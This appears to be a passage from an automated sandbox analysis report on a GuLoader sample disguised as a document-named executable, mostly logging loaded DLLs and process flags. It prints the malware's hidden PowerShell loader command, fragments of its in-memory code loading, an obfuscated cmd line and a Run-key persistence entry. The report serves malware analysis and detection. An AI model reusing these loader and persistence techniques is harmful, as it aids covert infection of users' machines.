              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: .pdb9 source: powershell.exe, 00000001.00000002.2204647066.000000000845C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbc source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55%y source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000001.00000002.2204905580.0000000009858000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Entwives $Skrlles $Sconcheon69), (Vintnery @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nonaltruistic = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Snaw)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bebudede, $false).DefineType($Afregningsprisen, $Son
              Obfuscated command line found
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04910A88 push edx; retn 0000h1_2_04910A92
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04911288 push esp; retn 0000h1_2_049112F1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_049112E8 push esp; retn 0000h1_2_049112F1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0745A581 push 8B05A924h; iretd 1_2_0745A586
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_074503E0 pushad ; ret 1_2_074503F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07458E9C pushad ; ret 1_2_07458EB1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB0C38 push edx; iretd 1_2_08CB0C45
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB31FD push ebp; iretd 1_2_08CB3204
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB4992 pushad ; ret 1_2_08CB49B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB1931 pushfd ; ret 1_2_08CB1932
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB0A7C push ds; ret 1_2_08CB0A7E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB4276 push cs; retf 1_2_08CB4288
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB43AB push cs; retf 1_2_08CB43B5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB33B1 push esp; ret 1_2_08CB33CF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB43B7 push ds; retf 1_2_08CB43BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB3372 push esi; ret 1_2_08CB3373
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB2B2B push ecx; ret 1_2_08CB2B2C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB3320 push ds; ret 1_2_08CB3322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E631FD push ebp; iretd 7_2_03E63204
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E643AB push cs; retf 7_2_03E643B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E643B7 push ds; retf 7_2_03E643BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E633B1 push esp; ret 7_2_03E633CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E64992 pushad ; ret 7_2_03E649B1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E63372 push esi; ret 7_2_03E63373
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E63320 push ds; ret 7_2_03E63322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E62B2B push ecx; ret 7_2_03E62B2C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E61931 pushfd ; ret 7_2_03E61932
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E64276 push cs; retf 7_2_03E64288
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E60A7C push ds; ret 7_2_03E60A7E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E60C38 push edx; iretd 7_2_03E60C45

              Persistence and Installation Behavior

              barindex
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeFile created: \586 r1 m-line - georgia 03.05.2024.exe
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeFile created: \586 r1 m-line - georgia 03.05.2024.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exeJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UnthematicJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UnthematicJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
